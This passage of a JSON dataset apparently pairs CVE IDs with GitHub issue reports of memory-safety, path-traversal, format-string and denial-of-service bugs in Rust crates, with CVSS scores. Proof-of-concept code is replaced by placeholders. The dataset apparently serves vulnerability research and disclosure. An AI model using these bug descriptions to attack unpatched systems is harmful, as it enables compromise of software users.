  85728. "Repo_new": "crossbeam-rs/crossbeam-epoch",
  85729. "Issue_Created_At": "2018-07-25T14:20:11Z",
  85730. "description": "Segfault. I'm not sure exactly which repo this issue belongs in. I just updated to crossbeam NUMBERTAG earlier and am now experiencing segfaults with the following stack trace. Apologies for the lack of pruning: ERRORTAG",
  85731. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85732. "severity": "CRITICAL",
  85733. "baseScore": 9.8,
  85734. "impactScore": 5.9,
  85735. "exploitabilityScore": 3.9
  85736. },
  85737. {
  85738. "CVE_ID": "CVE-2021-28037",
  85739. "Issue_Url_old": "https://github.com/droundy/internment/issues/20",
  85740. "Issue_Url_new": "https://github.com/droundy/internment/issues/20",
  85741. "Repo_new": "droundy/internment",
  85742. "Issue_Created_At": "2021-03-03T20:44:14Z",
  85743. "description": "Intern APITAG : Data race allowed on T. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG unconditionally implements Sync . This allows users to create data races on APITAG . Such data races can lead to undefined behavior. URLTAG Reproduction Below is an example program that exhibits undefined behavior (memory corruption) using safe APIs of internment . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: internment Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  85744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85745. "severity": "CRITICAL",
  85746. "baseScore": 9.8,
  85747. "impactScore": 5.9,
  85748. "exploitabilityScore": 3.9
  85749. },
  85750. {
  85751. "CVE_ID": "CVE-2021-25907",
  85752. "Issue_Url_old": "https://github.com/strake/containers.rs/issues/2",
  85753. "Issue_Url_new": "https://github.com/strake/containers.rs/issues/2",
  85754. "Repo_new": "strake/containers.rs",
  85755. "Issue_Created_At": "2021-01-12T13:47:29Z",
  85756. "description": "panic safety: double drop may happen within APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG Functions mutate & APITAG temporarily duplicate the ownership of an item using the given p (and q ). In case the given function f panics, the duplicated item will be dropped twice. Proof of Concept The given program below exhibits a double free error. ERRORTAG Program Output ERRORTAG Thank you for checking out this issue NUMBERTAG",
  85757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85758. "severity": "CRITICAL",
  85759. "baseScore": 9.8,
  85760. "impactScore": 5.9,
  85761. "exploitabilityScore": 3.9
  85762. },
  85763. {
  85764. "CVE_ID": "CVE-2021-25901",
  85765. "Issue_Url_old": "https://github.com/khuey/lazy-init/issues/9",
  85766. "Issue_Url_new": "https://github.com/khuey/lazy-init/issues/9",
  85767. "Repo_new": "khuey/lazy-init",
  85768. "Issue_Created_At": "2018-05-10T11:04:02Z",
  85769. "description": "potential soundness hole with types that are Sync + APITAG Hi, I believe that the ERRORTAG needs to also require Send. Otherwise it is possible to transfer non Send values between threads. Similar issues in other crates: URLTAG URLTAG CODETAG",
  85770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  85771. "severity": "MEDIUM",
  85772. "baseScore": 5.3,
  85773. "impactScore": 1.4,
  85774. "exploitabilityScore": 3.9
  85775. },
  85776. {
  85777. "CVE_ID": "CVE-2020-35890",
  85778. "Issue_Url_old": "https://github.com/maciejhirsz/ordnung/issues/8",
  85779. "Issue_Url_new": "https://github.com/maciejhirsz/ordnung/issues/8",
  85780. "Repo_new": "maciejhirsz/ordnung",
  85781. "Issue_Created_At": "2020-09-03T10:08:24Z",
  85782. "description": "Memory safety issues in APITAG . Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description APITAG contains multiple memory safety issues NUMBERTAG It mishandles large capacity and causes out of bound access in NUMBERTAG bit / allocator layout mismatch in NUMBERTAG bi NUMBERTAG APITAG is not panic safe and causes double free when an index larger than the length is provided. Demonstration Crate: ordnung Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85784. "severity": "HIGH",
  85785. "baseScore": 7.5,
  85786. "impactScore": 3.6,
  85787. "exploitabilityScore": 3.9
  85788. },
  85789. {
  85790. "CVE_ID": "CVE-2020-36217",
  85791. "Issue_Url_old": "https://github.com/Xudong-Huang/may/issues/88",
  85792. "Issue_Url_new": "https://github.com/xudong-huang/may/issues/88",
  85793. "Repo_new": "xudong-huang/may",
  85794. "Issue_Created_At": "2020-11-10T05:37:27Z",
  85795. "description": "Queue needs bounds on its APITAG traits. Currently, it is possible to use APITAG and APITAG to send across types that aren't safe to use in other threads. Due to the guarantee about there only being one popper, I think it should be APITAG when T is Send . Here's a demonstration with a data race using Cells: ERRORTAG which outputs: APITAG APITAG found by Rust group at APITAG gatech)",
  85796. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85797. "severity": "MEDIUM",
  85798. "baseScore": 5.9,
  85799. "impactScore": 3.6,
  85800. "exploitabilityScore": 2.2
  85801. },
  85802. {
  85803. "CVE_ID": "CVE-2019-15544",
  85804. "Issue_Url_old": "https://github.com/stepancheg/rust-protobuf/issues/411",
  85805. "Issue_Url_new": "https://github.com/stepancheg/rust-protobuf/issues/411",
  85806. "Repo_new": "stepancheg/rust-protobuf",
  85807. "Issue_Created_At": "2019-05-14T11:42:31Z",
  85808. "description": "Incorporate OOM fix in next release APITAG Please incorporate commit URLTAG from master in the next release APITAG In particular, please incorporate the following OOM fix: URLTAG URLTAG URLTAG URLTAG We hit this OOM error while fuzzing a project that uses the current release NUMBERTAG Patching NUMBERTAG with the above commit made the error go away. It would be convenient if the commit were incorporated in an official release. Thank you.",
  85809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85810. "severity": "HIGH",
  85811. "baseScore": 7.5,
  85812. "impactScore": 3.6,
  85813. "exploitabilityScore": 3.9
  85814. },
  85815. {
  85816. "CVE_ID": "CVE-2018-20995",
  85817. "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/57",
  85818. "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/57",
  85819. "Repo_new": "gnzlbg/slice_deque",
  85820. "Issue_Created_At": "2018-12-03T00:43:26Z",
  85821. "description": "APITAG causing memory corruption APITAG This took me a long while to figure out, but I narrowed it down to just a single line: APITAG The elements are simple APITAG structs; the first println outputs the queue in its normal state, whereas in the second all values are like NUMBERTAG or NUMBERTAG This only happens in a quickcheck like test suite where the queue is used super intensively, and pushes/pop are done thousands of times (it constantly fails at the same spot though). I could try running it through valgrind if it helps, not sure how else I could help. Is this a known issue perhaps?",
  85822. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85823. "severity": "CRITICAL",
  85824. "baseScore": 9.8,
  85825. "impactScore": 5.9,
  85826. "exploitabilityScore": 3.9
  85827. },
  85828. {
  85829. "CVE_ID": "CVE-2020-35857",
  85830. "Issue_Url_old": "https://github.com/bluejekyll/trust-dns/issues/980",
  85831. "Issue_Url_new": "https://github.com/bluejekyll/trust-dns/issues/980",
  85832. "Repo_new": "bluejekyll/trust-dns",
  85833. "Issue_Created_At": "2020-01-04T10:07:00Z",
  85834. "description": "thread 'trust dns server runtime' has overflowed its stack. Describe the bug Sometimes the server crashes after few seconds or after a few hours: ERRORTAG ~~To Reproduce~~ Steps to the behavior. Sorry, it doesn't seem reliably reproducible at the moment. I'll add more info, as soon I get more. APITAG Expected behavior No stack overflow. System: OS: Debian Architecture NUMBERTAG ersion: Testing rustc version NUMBERTAG e NUMBERTAG ersion: Crate: trust dns Version NUMBERTAG Additional context ERRORTAG",
  85835. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85836. "severity": "HIGH",
  85837. "baseScore": 7.5,
  85838. "impactScore": 3.6,
  85839. "exploitabilityScore": 3.9
  85840. },
  85841. {
  85842. "CVE_ID": "CVE-2021-28033",
  85843. "Issue_Url_old": "https://github.com/wwylele/byte-struct-rs/issues/1",
  85844. "Issue_Url_new": "https://github.com/wwylele/byte-struct-rs/issues/1",
  85845. "Repo_new": "wwylele/byte-struct-rs",
  85846. "Issue_Created_At": "2021-03-01T18:31:09Z",
  85847. "description": "FILETAG to avoid this problem.",
  85848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85849. "severity": "CRITICAL",
  85850. "baseScore": 9.8,
  85851. "impactScore": 5.9,
  85852. "exploitabilityScore": 3.9
  85853. },
  85854. {
  85855. "CVE_ID": "CVE-2019-15547",
  85856. "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/106",
  85857. "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/106",
  85858. "Repo_new": "rustsec/advisory-db",
  85859. "Issue_Created_At": "2019-06-09T08:04:30Z",
  85860. "description": "Format string vulnerabilities (and more) in multiple safe curses wrapper crates.. I've noticed potentially exploitable security vulnerabilities in the following crates NUMBERTAG which can be triggered by users of these libraries without writing unsafe code. I'm filing an issue rather than a PR since I don't know that I have time to see this through to it's conclusion, especially since multiple crates and several functions are involved. The FAQ [indicates that this is okay URLTAG . pancurses The crate URLTAG exposes the functions APITAG and APITAG as safe functions (I think this is all of them, but could be wrong), despite these passing an arbitrary rust str to into C code which expects to receive a printf style format string. This can lead to a format string vulnerability URLTAG . I filed URLTAG about this, shortly before filing this issue. ncurses The crate URLTAG exposes the functions printw , mvprintw , and mvwprintw as safe functions, which have the same issues described above. In URLTAG I raised this issue about printw (but missed that it wasn't just printw ), which lead to that functions deprecation NUMBERTAG When writing this issue for the advisory db, I noticed the existence of the other two functions. I don't see any other functions accepting format strings (the scanw functions, mercifully, are not exposed). Additionally, while filing this bug, I noticed the following additional vulnerabilities or memory safety issues (I haven't filed issues in the ncurses crate's repository about these): [ instr URLTAG is exposed, which has a buffer overflow (the curses instr function is somewhat similar to the gets function from the C stdlib, in that writes as much text that it wants into a lengthless buffer pointer). 
Several functions NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG write data from the terminal directly into a String's underlying buffer, when the data may not be valid UTF NUMBERTAG I don't know if this can be exploited, but it's a minor memory safety issue nonetheless. I have not done a very thorough look, these are just the most obvious problems to me. Ideally, someone more familiar with the ncurses API would look further NUMBERTAG For total clarity, I didn't look at any others. It seems plausible to me that other Rust curses libs have similar mistakes, since it's a very hard API to use safely. That said, I think these are the most popular ones (not that that makes things any better NUMBERTAG I don't really feel that deprecation is sufficient, as the function is still present (and not ERRORTAG ). Transitive dependency deprecations aren't reported, so rust code consuming this crate transitively could still be at risk. However, if the members of this repository disagree, then one fewer of the ncurses crates functions are problematic in the current release.",
  85861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85862. "severity": "HIGH",
  85863. "baseScore": 7.5,
  85864. "impactScore": 3.6,
  85865. "exploitabilityScore": 3.9
  85866. },
  85867. {
  85868. "CVE_ID": "CVE-2019-15547",
  85869. "Issue_Url_old": "https://github.com/jeaye/ncurses-rs/issues/172",
  85870. "Issue_Url_new": "https://github.com/jeaye/ncurses-rs/issues/172",
  85871. "Repo_new": "jeaye/ncurses-rs",
  85872. "Issue_Created_At": "2018-11-27T00:28:15Z",
  85873. "description": "printw should not be exposed.. It's very difficult / impossible to use this function from rust without introducing a format string vulnerability into your code (which can be used to trigger arbitrary code execution). If you must expose something like it, have it just call addstr or mark it as unsafe (and deprecate it in both cases, IMO). See also NUMBERTAG and NUMBERTAG",
  85874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85875. "severity": "HIGH",
  85876. "baseScore": 7.5,
  85877. "impactScore": 3.6,
  85878. "exploitabilityScore": 3.9
  85879. },
  85880. {
  85881. "CVE_ID": "CVE-2021-38511",
  85882. "Issue_Url_old": "https://github.com/alexcrichton/tar-rs/issues/238",
  85883. "Issue_Url_new": "https://github.com/alexcrichton/tar-rs/issues/238",
  85884. "Repo_new": "alexcrichton/tar-rs",
  85885. "Issue_Created_At": "2020-09-10T13:27:37Z",
  85886. "description": "unpack_in allows creating directories outside the dst directory. The following code will create the folders exploit and APITAG outside of the demo folder: ERRORTAG ERRORTAG calls APITAG ( APITAG URLTAG on the untrusted path and therefore can create directories outside of the dst directory. APITAG The provided code will fail with the expected error that APITAG is outside of demo , but the parent directories are already created outside of the demo folder. This is kind of related to NUMBERTAG but still works in the current master.",
  85887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85888. "severity": "HIGH",
  85889. "baseScore": 7.5,
  85890. "impactScore": 3.6,
  85891. "exploitabilityScore": 3.9
  85892. },
  85893. {
  85894. "CVE_ID": "CVE-2020-36218",
  85895. "Issue_Url_old": "https://github.com/buttplugio/buttplug-rs/issues/225",
  85896. "Issue_Url_new": "https://github.com/buttplugio/buttplug/issues/225",
  85897. "Repo_new": "buttplugio/buttplug",
  85898. "Issue_Created_At": "2020-12-19T01:33:06Z",
  85899. "description": "APITAG allows data race to APITAG objects. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue ( Describe the bug ) Send / Sync are unconditionally implemented for APITAG , and thus it is possible to cause a data race to a ( APITAG | APITAG ) object. ERRORTAG Proof of Concept ( Actual behavior ) Below is an example program that segfaults while using APITAG . The segfault behavior was observed when the program was built with APITAG in Debug mode, and run on APITAG . The program below allows two threads to concurrently access the same Cell (one thread writes to Cell while the other thread reads from Cell ). ERRORTAG Suggested Solution Adding APITAG bound to the Send impl & APITAG bound to the Sync impl can prevent code like the above to be revoked by the compiler. ERRORTAG Thank you for reviewing this issue :crab:",
  85900. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85901. "severity": "MEDIUM",
  85902. "baseScore": 5.9,
  85903. "impactScore": 3.6,
  85904. "exploitabilityScore": 2.2
  85905. },
  85906. {
  85907. "CVE_ID": "CVE-2021-25905",
  85908. "Issue_Url_old": "https://github.com/Enet4/bra-rs/issues/1",
  85909. "Issue_Url_new": "https://github.com/enet4/bra-rs/issues/1",
  85910. "Repo_new": "enet4/bra-rs",
  85911. "Issue_Created_At": "2021-01-02T17:38:01Z",
  85912. "description": "reading on uninitialized buffer can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It is safe to zero initialize the newly allocated APITAG buffer before APITAG , in order to prevent user provided Read from reading old contents of the newly allocated heap memory. The version available on APITAG seems to be different from the latest master branch of this repo, but the same issue exists in APITAG (bra NUMBERTAG Thank you for checking out this issue NUMBERTAG",
  85913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  85914. "severity": "CRITICAL",
  85915. "baseScore": 9.1,
  85916. "impactScore": 5.2,
  85917. "exploitabilityScore": 3.9
  85918. },
  85919. {
  85920. "CVE_ID": "CVE-2020-36443",
  85921. "Issue_Url_old": "https://github.com/libp2p/rust-libp2p/issues/1932",
  85922. "Issue_Url_new": "https://github.com/libp2p/rust-libp2p/issues/1932",
  85923. "Repo_new": "libp2p/rust-libp2p",
  85924. "Issue_Created_At": "2021-01-24T23:18:34Z",
  85925. "description": "Undefined data exposed in APITAG APITAG implementation. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG 's implementation of APITAG does the following: URLTAG This sets up uninitialized bytes in APITAG and then passes it to the user provided APITAG method. This allows invoking undefined behavior from safe Rust code, reading uninitialized memory. This issue is described a bit in the documentation for FILETAG : > It is your responsibility to make sure that buf is initialized before calling read. Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Here's an example that outputs uninitialized memory using this: APITAG APITAG to expand APITAG ERRORTAG APITAG",
  85926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85927. "severity": "CRITICAL",
  85928. "baseScore": 9.8,
  85929. "impactScore": 5.9,
  85930. "exploitabilityScore": 3.9
  85931. },
  85932. {
  85933. "CVE_ID": "CVE-2020-35902",
  85934. "Issue_Url_old": "https://github.com/actix/actix-net/issues/91",
  85935. "Issue_Url_new": "https://github.com/actix/actix-net/issues/91",
  85936. "Repo_new": "actix/actix-net",
  85937. "Issue_Created_At": "2020-01-30T14:27:19Z",
  85938. "description": "UB due to unsafe pinning in actix codec. The following code segfaults, due to incorrect pinning in Framed . ERRORTAG",
  85939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85940. "severity": "CRITICAL",
  85941. "baseScore": 9.8,
  85942. "impactScore": 5.9,
  85943. "exploitabilityScore": 3.9
  85944. },
  85945. {
  85946. "CVE_ID": "CVE-2021-25908",
  85947. "Issue_Url_old": "https://github.com/cogciprocate/ocl/issues/194",
  85948. "Issue_Url_new": "https://github.com/cogciprocate/ocl/issues/194",
  85949. "Repo_new": "cogciprocate/ocl",
  85950. "Issue_Created_At": "2021-01-04T13:06:37Z",
  85951. "description": "double drop may happen upon panic in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description We found NUMBERTAG cases (below) where a double drop of an object can happen if a panic occurs within the user provided APITAG implementation. URLTAG URLTAG Proof of Concept The example program below exhibits a double drop. ERRORTAG Suggested Fix In this case, using APITAG can help guard against the potential panic within APITAG . I'll submit a PR with the suggested fix right away. Thank you for checking out this issue NUMBERTAG",
  85952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85953. "severity": "HIGH",
  85954. "baseScore": 7.5,
  85955. "impactScore": 3.6,
  85956. "exploitabilityScore": 3.9
  85957. },
  85958. {
  85959. "CVE_ID": "CVE-2020-35894",
  85960. "Issue_Url_old": "https://github.com/petertodd/rust-obstack/issues/4",
  85961. "Issue_Url_new": "https://github.com/petertodd/rust-obstack/issues/4",
  85962. "Repo_new": "petertodd/rust-obstack",
  85963. "Issue_Created_At": "2020-09-03T06:27:05Z",
  85964. "description": "Obstack generates unaligned references. URLTAG Description Obstack generates unaligned references for types that require a large alignment. Demonstration Crate: obstack Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85966. "severity": "HIGH",
  85967. "baseScore": 7.5,
  85968. "impactScore": 3.6,
  85969. "exploitabilityScore": 3.9
  85970. },
  85971. {
  85972. "CVE_ID": "CVE-2020-36204",
  85973. "Issue_Url_old": "https://github.com/bodil/im-rs/issues/157",
  85974. "Issue_Url_new": "https://github.com/bodil/im-rs/issues/157",
  85975. "Repo_new": "bodil/im-rs",
  85976. "Issue_Created_At": "2020-11-09T07:14:37Z",
  85977. "description": "APITAG lacks bounds on its Send and Sync traits. It looks like the version of Focus for RRB tree backed vectors, APITAG lacks bounds for Sync and Send : URLTAG I realize APITAG is an implementation detail and not really meant to be used by end users of the library but I think this opens up the possibility of causing data races through safe Rust code like this: ERRORTAG which outputs APITAG APITAG found by the Rust group at APITAG gatech)",
  85978. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85979. "severity": "MEDIUM",
  85980. "baseScore": 4.7,
  85981. "impactScore": 3.6,
  85982. "exploitabilityScore": 1.0
  85983. },
  85984. {
  85985. "CVE_ID": "CVE-2021-26308",
  85986. "Issue_Url_old": "https://github.com/blackbeam/rust-marc/issues/7",
  85987. "Issue_Url_new": "https://github.com/blackbeam/rust-marc/issues/7",
  85988. "Repo_new": "blackbeam/rust-marc",
  85989. "Issue_Created_At": "2021-01-27T04:02:42Z",
  85990. "description": "Record::read : Custom Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG FILETAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Another question I have regarding APITAG : Right before APITAG , why APITAG instead of APITAG ? At the moment it seems unsound to me :( How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  85991. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85992. "severity": "HIGH",
  85993. "baseScore": 7.5,
  85994. "impactScore": 3.6,
  85995. "exploitabilityScore": 3.9
  85996. },
  85997. {
  85998. "CVE_ID": "CVE-2021-29932",
  85999. "Issue_Url_old": "https://github.com/zeta12ti/parse_duration/issues/21",
  86000. "Issue_Url_new": "https://github.com/zeta12ti/parse_duration/issues/21",
  86001. "Repo_new": "zeta12ti/parse_duration",
  86002. "Issue_Created_At": "2021-03-18T14:59:54Z",
  86003. "description": "Denial of service through malicious payloads. Hey, As reported in URLTAG there are payloads that makes the APITAG to cause denial of service through big integer pow calculations. I am not sure if the suggested solution is the best one, maybe there should be a way to specify the exponent limit or whether we accept an exponent at all in the duration string. Since the repo didn't have any commit for a ~year, MENTIONTAG are you going to fix it?",
  86004. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86005. "severity": "HIGH",
  86006. "baseScore": 7.5,
  86007. "impactScore": 3.6,
  86008. "exploitabilityScore": 3.9
  86009. },
  86010. {
  86011. "CVE_ID": "CVE-2020-36467",
  86012. "Issue_Url_old": "https://github.com/playXE/cgc/issues/5",
  86013. "Issue_Url_new": "https://github.com/playxe/cgc/issues/5",
  86014. "Repo_new": "playxe/cgc",
  86015. "Issue_Created_At": "2020-12-10T08:24:12Z",
  86016. "description": "Soundness issues with Ptr. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed some soundness issues in the Ptr class NUMBERTAG Ptr implements the Send and Sync traits for all types: URLTAG This allows you to send types that aren't safe to use across threads like Rc and Cell . We'd recommend only implementing this when the APITAG and APITAG NUMBERTAG Ptr violates aliasing rules by having APITAG take a reference and return a mutable reference. URLTAG This allows you to create multiple mutable references to the same object which is undefined behavior in Rust NUMBERTAG APITAG writes to the raw pointer underneath: URLTAG This can lead to data races, using an atomic pointer would be better if you want to support multiple threads. Here's a proof of concept for two of the issues above: ERRORTAG This outputs: APITAG",
  86017. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86018. "severity": "MEDIUM",
  86019. "baseScore": 5.9,
  86020. "impactScore": 3.6,
  86021. "exploitabilityScore": 2.2
  86022. },
  86023. {
  86024. "CVE_ID": "CVE-2021-29940",
  86025. "Issue_Url_old": "https://github.com/gretchenfrage/through/issues/1",
  86026. "Issue_Url_new": "https://github.com/gretchenfrage/through/issues/1",
  86027. "Repo_new": "gretchenfrage/through",
  86028. "Issue_Created_At": "2021-02-18T16:48:01Z",
  86029. "description": "double free of T upon panic in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Public functions APITAG and APITAG are not panic safe. Both take a user provided closure as a parameter, and a double drop of T will happen if the user provided closure panics. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of through . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: through Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  86030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86031. "severity": "CRITICAL",
  86032. "baseScore": 9.8,
  86033. "impactScore": 5.9,
  86034. "exploitabilityScore": 3.9
  86035. },
  86036. {
  86037. "CVE_ID": "CVE-2020-36461",
  86038. "Issue_Url_old": "https://github.com/pipedown/noise/issues/72",
  86039. "Issue_Url_new": "https://github.com/pipedown/noise/issues/72",
  86040. "Repo_new": "pipedown/noise",
  86041. "Issue_Created_At": "2020-12-10T06:28:35Z",
  86042. "description": "Soundness issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably have tighter bounds on its Send and Sync traits, otherwise it's possible to create data races from safe rust code by using non Sync types like Cell across threads or sending non Send types across like Rc . Here's a little proof of concept using Rc . ERRORTAG This outputs: APITAG It seems like this class also potentially allows for aliasing violations, in this case maybe it would be better to mark the methods as unsafe and maybe not expose the class outside the crate?",
  86043. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86044. "severity": "HIGH",
  86045. "baseScore": 8.1,
  86046. "impactScore": 5.9,
  86047. "exploitabilityScore": 2.2
  86048. },
  86049. {
  86050. "CVE_ID": "CVE-2020-35881",
  86051. "Issue_Url_old": "https://github.com/reem/rust-traitobject/issues/7",
  86052. "Issue_Url_new": "https://github.com/reem/rust-traitobject/issues/7",
  86053. "Repo_new": "reem/rust-traitobject",
  86054. "Issue_Created_At": "2020-06-01T11:44:40Z",
  86055. "description": "Please, release a new version. The implementation of the data and APITAG functions is highly unsafe: URLTAG This assumes that the first element of a fat pointer is the data pointer. This is currently true, but it can change in a newer rust version, which would make this crate a potential security hole. Commit URLTAG fixed this, but it has not been released into a new version. Please, publish a new version NUMBERTAG that includes this commit (and possibly yank the previous versions).",
  86056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86057. "severity": "CRITICAL",
  86058. "baseScore": 9.8,
  86059. "impactScore": 5.9,
  86060. "exploitabilityScore": 3.9
  86061. },
  86062. {
  86063. "CVE_ID": "CVE-2021-30455",
  86064. "Issue_Url_old": "https://github.com/andrewhickman/id-map/issues/3",
  86065. "Issue_Url_new": "https://github.com/andrewhickman/id-map/issues/3",
  86066. "Repo_new": "andrewhickman/id-map",
  86067. "Issue_Created_At": "2021-02-26T05:26:13Z",
  86068. "description": "Multiple panic safety issues. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a few FILETAG issues in this library. clone_from double frees if T::clone panics URLTAG The current values in the map are dropped and the ids are updated up front. This means that if ERRORTAG panics, it can cause the previously dropped values to drop again. get_or_insert double frees if insertion function f panics URLTAG Since this reserves space for the value before calling APITAG , if f panics here, it can drop an already freed value. remove_set double frees if drop panics URLTAG This code goes over the ids to remove and calls APITAG on them. However if the drop function for the type panics, the element gets dropped again when the APITAG is dropped. Code to recreate these problems is here: ERRORTAG",
  86069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86070. "severity": "CRITICAL",
  86071. "baseScore": 9.8,
  86072. "impactScore": 5.9,
  86073. "exploitabilityScore": 3.9
  86074. },
  86075. {
  86076. "CVE_ID": "CVE-2019-25005",
  86077. "Issue_Url_old": "https://github.com/RustCrypto/stream-ciphers/issues/64",
  86078. "Issue_Url_new": "https://github.com/rustcrypto/stream-ciphers/issues/64",
  86079. "Repo_new": "rustcrypto/stream-ciphers",
  86080. "Issue_Created_At": "2019-10-22T11:44:30Z",
  86081. "description": "Best place to discuss possible security issues?. Hi! What's the best place to discuss possible security issues regarding the code in this repo?",
  86082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86083. "severity": "HIGH",
  86084. "baseScore": 7.5,
  86085. "impactScore": 3.6,
  86086. "exploitabilityScore": 3.9
  86087. },
  86088. {
  86089. "CVE_ID": "CVE-2020-36440",
  86090. "Issue_Url_old": "https://github.com/mvertescher/libsbc-rs/issues/4",
  86091. "Issue_Url_new": "https://github.com/mvertescher/libsbc-rs/issues/4",
  86092. "Repo_new": "mvertescher/libsbc-rs",
  86093. "Issue_Created_At": "2020-11-10T07:57:54Z",
